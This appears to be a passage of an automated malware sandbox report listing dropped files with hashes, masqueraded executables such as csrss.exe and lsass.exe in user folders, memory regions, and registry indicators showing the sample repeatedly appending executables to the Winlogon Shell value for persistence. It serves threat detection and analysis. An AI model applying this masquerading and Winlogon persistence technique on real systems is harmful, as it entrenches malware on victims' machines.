3ba378cfbe28c4c96dc95b5d514a937ea0b4922e3fca71c84c477a6b3d2f4e9f

SHA512
d6f8abdb062ef9b28249853e9692ec67cbc0dbd49b41b86d3cb56292cac8f26930b56779010fed448bcc9d44ebe5fae5fd1136fd47dd6cefbb8d4ba783040879

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d23190e1687db4d7295fb2ec577b9fd2

SHA1
23917d7a2bb072da18374c35a08bf5677a4b7066

SHA256
eebff86b54d64467c48c011f12b9a70d82d5fc2b6884244d01a962f22c474ca2

SHA512
b0e73de0b0d2ecfe00016d29c614e4a483d87b4e7ffba13bcefb7621d7140be9d2bfecafda9fdc90ad02dab49f1c0bfa3eb15a2168622134581598a9ee625869

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
97e3c41b64690ca26cc656746b62897f

SHA1
e793d27c8fa6189e045c97ee694a74fb5fb83d33

SHA256
2de4e2b43c19a9451b83f1ad7b628d28172ae867679f010e782a029fd012b43a

SHA512
505d9bbb7d6fce08fb94e456d75d1a894cadc75a34bbc1b7791a231e1295fc669e0aff05f6d4464241308cdbdc9251ed010ece7c48fd3ec69d2a8da1ee2ccb1b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
807c8be5c02c479052ecd56c0b58d533

SHA1
7236078afa31f6b1f530a47ef336b3af203baf8c

SHA256
9b2400d6c397150a09c2eeab16294a09e288c534b23ac9e8b170477b66ed223c

SHA512
90e2ed7255ddafbabe17cf6d3c80db783c08799753abf70eab1873c7f7c468434af979f139d5e36cb34533a3fdcec02030eecf82e42d71acad59876659831f67

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
6ada6e57d78a7ff37e7cd8eff012e235

SHA1
8089d3697ce50408a6f80fc220b83fb45b18aa86

SHA256
265b67bd7dbd27428340a9dc8cb65224a882dfac89f2d9126a7e17e6909d37e2

SHA512
7b69273744f0c26587207596216ebdd942f2efeddb155f1abe4c6652389e849549f219b0a03e27c5a7c9de3fdaa8bf152e6d3f407b68f67e6898f5a626455689

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
cebda3a0a4487de1cf386f8e22ce9c0b

SHA1
45f40c541ec040c5705df60df991e4b8851c53a8

SHA256
de37c003b50746cf52c3ed40f70a1f86ce67d77b36d3decfb8b8fb715f17d7a6

SHA512
827d9959dcd01c249d2b96f183018c1ae72f81be4d5c6627f4d02210b3eb6c089844bca9bddc5ff6280be9b992badd0076cbfe4fe126fb5ee5b7a1ff8a57196c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
81b35a2ea50cfffe60e015ae708ed0b1

SHA1
28b654b29fc60a754e9d3ba7bc68a644340860d0

SHA256
cebebfc0b3f91506bb8eadd34a213f6e4c68eaffcdf6772f961bf760a5fc5cb5

SHA512
a16100e5e5bc5f6fad32ea21814ca61025e4aebe6a282d2d84e67f893167ef0d21b4bbfdfbd2b56d82c19e79e0bc6a0dcb5dec1a7c8ae1ea86f3b38b2b6b2ca0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
b8d35e840e2c3a93d7382e7db4054e02

SHA1
aebc3e82f673f56458b16024dbef744421f4b8df

SHA256
d0e436a5726b6110a67f5af7a552b7b0a139c17d05d93d3620ec6a41a1af7c99

SHA512
ce240238b4fce116c1008f5653c6fd79011871ef48255c5cde2cf75f769cae1c17a7c4f17b18d3ad3053111ec48f004ff6c16035440b1f8b35cad6f5096a25e3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
182c1e3c0ee6004591ebc8f79108cab8

SHA1
ad1d5a8ace0bcef1a0fac37bd532a4caafd1802b

SHA256
c7717b2f85b1f44c5e85dffdb185e19b632787dba81a11f870b41ca55cdd86c4

SHA512
c0ba5bb99a46657300ce731210c87eec16620d9fe7f73265dc3b4f2470f717878bf2211e8b2a8d9b662e9cf6b57db91dddf119bbc28b94e76edb5a5279a774d9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
0d4f2c2f92c17795c13e51aeac5625e3

SHA1
8b6668137ab74db62ab256ca439f1ebb44e47468

SHA256
dc996036c1e4e5326ac63ddd3180f087101fac51f7de50375981f62ba1b7ae01

SHA512
28a36386c25ae4b87c78109dcd09b70f28c28743386d7e81d15047c076299653ee8405c44036cab47ecb4d9de15383a54ec5f1aa8fe91b6e36aa566f2e59a45c

Download Submit
C:\Users\Admin\AppData\Local\Temp\674c385e-66b5-45b5-9189-a5b397ddd042.vbs

Filesize
767B

MD5
4885a08f27d2db7c319f32934192fa11

SHA1
ef39a68e6151ff40d48eed235e6b927ea2742faf

SHA256
1d87d53615f75a5b89266eee9bdb084057abe5bfab2f73a1148df5fbe735f514

SHA512
2c54e1cc5cbb31ed91edcf0bffb7ca3ea716928f78405d60c353c1fef62f40606885708326fe1bc18c018cf40c562c19dcf92014b02dcb3af6ceea55532a4e10

Download Submit
C:\Users\Admin\AppData\Local\Temp\9cd71340-e437-49e2-b46f-57e7cf4a21df.vbs

Filesize
543B

MD5
1115a24ad14da73b679d9f2e2d9e4801

SHA1
6042ba69532b6d9cf3605ff3d9dc826f61a9d370

SHA256
e471f925ddd6ad12b8c0faaacc9d8705953cac3403cccba5b43affcda1e5ad17

SHA512
f24245aabd41f95fc022562cc8d3133e7632b75bf90f8e55f29b3ac84b443f290ed082bea9c64dc9315c4f1a1e067e1783c4b8deb0a50db0a79cab075ed93eb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab7A32.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab7AC0.tmp

Filesize
71KB

MD5
83142242e97b8953c386f988aa694e4a

SHA1
833ed12fc15b356136dcdd27c61a50f59c5c7d50

SHA256
d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

SHA512
bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar7AF4.tmp

Filesize
183KB

MD5
109cab5505f5e065b63d01361467a83b

SHA1
4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

SHA256
ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

SHA512
753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZIwY3l9Tbx.bat

Filesize
256B

MD5
8f8c80d29e5654758217f333ee5850a0

SHA1
61b32062df2e5123dcfcbcc517a21099e4c26897

SHA256
7f65dfa9f6338b2ea0756e1bc565b624dc660fa86cc7405afbb1b88cbc3fae06

SHA512
c990b338b2ce7c4e4c9db11201347e040b6cc8212c9fee569789292964a041cf3f15d2454214ec6633c70d794213b8145c925d9232120dcb53febc7eb7ac8a94

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bb434532a70e5115cc0fbb6012f5f363

SHA1
db314ada5690d5081eff773a7ab58d0bc637fe55

SHA256
93ea0cec4ebe17353d2cce063bca8de7da77bb0103b88e2079e557b0a4f82ec2

SHA512
0b83746cf7709d9463cc47e7c26ea8e1f0e7271855bd121dbc15d973c8a7d57a778a75ec4ba88922dae7ce43447149006825e07f8e158791d9ad6db62c832735

Download Submit
C:\Users\Default\csrss.exe

Filesize
3.0MB

MD5
4bc701fc5e13c1287646e5d1f79760d4

SHA1
6bc6e4c44012084ec5af5ebdfd09314e598464e1

SHA256
da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb

SHA512
fd3bf97de8840b16ae72295082e6aff5f0833de8791d39dc6a347cab771af1b88cfcc56c307c663112d2207cf2a0059a0882b053aa8fa0b67a1f3a3a183ee503

Download Submit
C:\Users\Public\Favorites\lsass.exe

Filesize
3.0MB

MD5
0a2852cac03f67e1e87d049447c30ff9

SHA1
ea883cf8326f54447f15947504d3942fc8d1fda4

SHA256
788d77d89761066a42710f344bba792cc5a8ef5f359e7413639605e6a9353684

SHA512
6ff2725b2ad9fa570366bb353951d10f521ad206f4a0e8ebafcb2d85897db1688127354078364b683e718310b27e4c85e2f773c51daeaa1282f521205927e4fa

Download Submit
C:\Users\Public\Videos\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe

Filesize
3.0MB

MD5
6c87eb46dce1f82564138346c4d75504

SHA1
43f02d30a59e012404667b1c39f9a6c0fce2b16c

SHA256
ccf24af5c78ed55ce383851e41f02879b2d2223ef62b073aefc7b3a2e214e9ce

SHA512
dcd84da8bdc693e72fb8ed8a9f777cde136d32f229dfed2f5426747678a83385b1ef5da2d604837808b70eb53ba19e7fd640c0053062101d96180f8089e05f8b

Download Submit
memory/1668-273-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/1668-263-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2484-20-0x0000000000D90000-0x0000000000D98000-memory.dmp

Filesize
32KB

Download
memory/2484-9-0x0000000000B80000-0x0000000000B88000-memory.dmp

Filesize
32KB

Download
memory/2484-0-0x000007FEF5813000-0x000007FEF5814000-memory.dmp

Filesize
4KB

Download
memory/2484-207-0x000007FEF5813000-0x000007FEF5814000-memory.dmp

Filesize
4KB

Download
memory/2484-231-0x000007FEF5810000-0x000007FEF61FC000-memory.dmp

Filesize
9.9MB

Download
memory/2484-17-0x0000000000CC0000-0x0000000000CD2000-memory.dmp

Filesize
72KB

Download
memory/2484-29-0x0000000001360000-0x0000000001368000-memory.dmp

Filesize
32KB

Download
memory/2484-31-0x000000001AB70000-0x000000001AB7C000-memory.dmp

Filesize
48KB

Download
memory/2484-308-0x000007FEF5810000-0x000007FEF61FC000-memory.dmp

Filesize
9.9MB

Download
memory/2484-26-0x00000000012F0000-0x00000000012F8000-memory.dmp

Filesize
32KB

Download
memory/2484-1-0x0000000001380000-0x000000000168E000-memory.dmp

Filesize
3.1MB

Download
memory/2484-2-0x000007FEF5810000-0x000007FEF61FC000-memory.dmp

Filesize
9.9MB

Download
memory/2484-25-0x0000000000E60000-0x0000000000E6E000-memory.dmp

Filesize
56KB

Download
memory/2484-24-0x0000000000E50000-0x0000000000E5A000-memory.dmp

Filesize
40KB

Download
memory/2484-23-0x0000000000E40000-0x0000000000E48000-memory.dmp

Filesize
32KB

Download
memory/2484-22-0x0000000000E30000-0x0000000000E3C000-memory.dmp

Filesize
48KB

Download
memory/2484-21-0x0000000000DA0000-0x0000000000DAC000-memory.dmp

Filesize
48KB

Download
memory/2484-30-0x0000000001370000-0x000000000137A000-memory.dmp

Filesize
40KB

Download
memory/2484-28-0x0000000001350000-0x000000000135C000-memory.dmp

Filesize
48KB

Download
memory/2484-18-0x0000000000CD0000-0x0000000000CDC000-memory.dmp

Filesize
48KB

Download
memory/2484-27-0x0000000001300000-0x0000000001308000-memory.dmp

Filesize
32KB

Download
memory/2484-16-0x0000000000CB0000-0x0000000000CB8000-memory.dmp

Filesize
32KB

Download
memory/2484-15-0x0000000000CA0000-0x0000000000CAC000-memory.dmp

Filesize
48KB

Download
memory/2484-14-0x0000000000C90000-0x0000000000C98000-memory.dmp

Filesize
32KB

Download
memory/2484-13-0x0000000000C80000-0x0000000000C8C000-memory.dmp

Filesize
48KB

Download
memory/2484-12-0x0000000000C30000-0x0000000000C86000-memory.dmp

Filesize
344KB

Download
memory/2484-11-0x0000000000B90000-0x0000000000B9A000-memory.dmp

Filesize
40KB

Download
memory/2484-10-0x0000000000BA0000-0x0000000000BB0000-memory.dmp

Filesize
64KB

Download
memory/2484-19-0x0000000000D80000-0x0000000000D8C000-memory.dmp

Filesize
48KB

Download
memory/2484-8-0x0000000000610000-0x0000000000618000-memory.dmp

Filesize
32KB

Download
memory/2484-7-0x0000000000B60000-0x0000000000B76000-memory.dmp

Filesize
88KB

Download
memory/2484-6-0x0000000000600000-0x0000000000610000-memory.dmp

Filesize
64KB

Download
memory/2484-5-0x00000000005F0000-0x00000000005F8000-memory.dmp

Filesize
32KB

Download
memory/2484-4-0x00000000003E0000-0x00000000003FC000-memory.dmp

Filesize
112KB

Download
memory/2484-3-0x00000000003D0000-0x00000000003D8000-memory.dmp

Filesize
32KB

Download
memory/2676-350-0x000000001A8F0000-0x000000001A902000-memory.dmp

Filesize
72KB

Download
memory/2676-349-0x0000000000E30000-0x000000000113E000-memory.dmp

Filesize
3.1MB

Download

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\Idle.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsm.exe\", \"C:\\Users\\Public\\Videos\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Users\\Default User\\csrss.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\OSPPSVC.exe\", \"C:\\Program Files\\Windows Portable Devices\\OSPPSVC.exe\", \"C:\\Windows\\tracing\\dllhost.exe\", \"C:\\Program Files\\Mozilla Firefox\\gmp-clearkey\\csrss.exe\", \"C:\\Users\\All Users\\Favorites\\lsass.exe\", \"C:\\Recovery\\1f4ba082-69f6-11ef-a143-62cb582c238c\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Program Files\\Internet Explorer\\es-ES\\sppsvc.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\Idle.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsm.exe\", \"C:\\Users\\Public\\Videos\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\Idle.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsm.exe\", \"C:\\Users\\Public\\Videos\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Users\\Default User\\csrss.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\Idle.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsm.exe\", \"C:\\Users\\Public\\Videos\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Users\\Default User\\csrss.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\OSPPSVC.exe\", \"C:\\Program Files\\Windows Portable Devices\\OSPPSVC.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\Idle.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsm.exe\", \"C:\\Users\\Public\\Videos\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Users\\Default User\\csrss.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\OSPPSVC.exe\", \"C:\\Program Files\\Windows Portable Devices\\OSPPSVC.exe\", \"C:\\Windows\\tracing\\dllhost.exe\", \"C:\\Program Files\\Mozilla Firefox\\gmp-clearkey\\csrss.exe\", \"C:\\Users\\All Users\\Favorites\\lsass.exe\", \"C:\\Recovery\\1f4ba082-69f6-11ef-a143-62cb582c238c\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\Idle.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsm.exe\", \"C:\\Users\\Public\\Videos\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Users\\Default User\\csrss.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\OSPPSVC.exe\", \"C:\\Program Files\\Windows Portable Devices\\OSPPSVC.exe\", \"C:\\Windows\\tracing\\dllhost.exe\", \"C:\\Program Files\\Mozilla Firefox\\gmp-clearkey\\csrss.exe\", \"C:\\Users\\All Users\\Favorites\\lsass.exe\", \"C:\\Recovery\\1f4ba082-69f6-11ef-a143-62cb582c238c\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Program Files\\Internet Explorer\\es-ES\\sppsvc.exe\", \"C:\\Recovery\\1f4ba082-69f6-11ef-a143-62cb582c238c\\wininit.exe\", \"C:\\Program Files\\Windows Media Player\\fr-FR\\spoolsv.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\Idle.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\Idle.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsm.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\Idle.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsm.exe\", \"C:\\Users\\Public\\Videos\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Users\\Default User\\csrss.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\OSPPSVC.exe\", \"C:\\Program Files\\Windows Portable Devices\\OSPPSVC.exe\", \"C:\\Windows\\tracing\\dllhost.exe\", \"C:\\Program Files\\Mozilla Firefox\\gmp-clearkey\\csrss.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\Idle.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsm.exe\", \"C:\\Users\\Public\\Videos\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Users\\Default User\\csrss.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\OSPPSVC.exe\", \"C:\\Program Files\\Windows Portable Devices\\OSPPSVC.exe\", \"C:\\Windows\\tracing\\dllhost.exe\", \"C:\\Program Files\\Mozilla Firefox\\gmp-clearkey\\csrss.exe\", \"C:\\Users\\All Users\\Favorites\\lsass.exe\", \"C:\\Recovery\\1f4ba082-69f6-11ef-a143-62cb582c238c\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\Idle.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\Idle.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsm.exe\", \"C:\\Users\\Public\\Videos\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Users\\Default User\\csrss.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\OSPPSVC.exe\", \"C:\\Program Files\\Windows Portable Devices\\OSPPSVC.exe\", \"C:\\Windows\\tracing\\dllhost.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\Idle.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsm.exe\", \"C:\\Users\\Public\\Videos\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Users\\Default User\\csrss.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\OSPPSVC.exe\", \"C:\\Program Files\\Windows Portable Devices\\OSPPSVC.exe\", \"C:\\Windows\\tracing\\dllhost.exe\", \"C:\\Program Files\\Mozilla Firefox\\gmp-clearkey\\csrss.exe\", \"C:\\Users\\All Users\\Favorites\\lsass.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\Idle.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsm.exe\", \"C:\\Users\\Public\\Videos\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Users\\Default User\\csrss.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\OSPPSVC.exe\", \"C:\\Program Files\\Windows Portable Devices\\OSPPSVC.exe\", \"C:\\Windows\\tracing\\dllhost.exe\", \"C:\\Program Files\\Mozilla Firefox\\gmp-clearkey\\csrss.exe\", \"C:\\Users\\All Users\\Favorites\\lsass.exe\", \"C:\\Recovery\\1f4ba082-69f6-11ef-a143-62cb582c238c\\Idle.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\Idle.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsm.exe\", \"C:\\Users\\Public\\Videos\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Users\\Default User\\csrss.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\OSPPSVC.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\Idle.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsm.exe\", \"C:\\Users\\Public\\Videos\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Users\\Default User\\csrss.exe\", \"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\OSPPSVC.exe\", \"C:\\Program Files\\Windows Portable Devices\\OSPPSVC.exe\", \"C:\\Windows\\tracing\\dllhost.exe\", \"C:\\Program Files\\Mozilla Firefox\\gmp-clearkey\\csrss.exe\", \"C:\\Users\\All Users\\Favorites\\lsass.exe\", \"C:\\Recovery\\1f4ba082-69f6-11ef-a143-62cb582c238c\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\", \"C:\\Program Files\\Internet Explorer\\es-ES\\sppsvc.exe\", \"C:\\Recovery\\1f4ba082-69f6-11ef-a143-62cb582c238c\\wininit.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe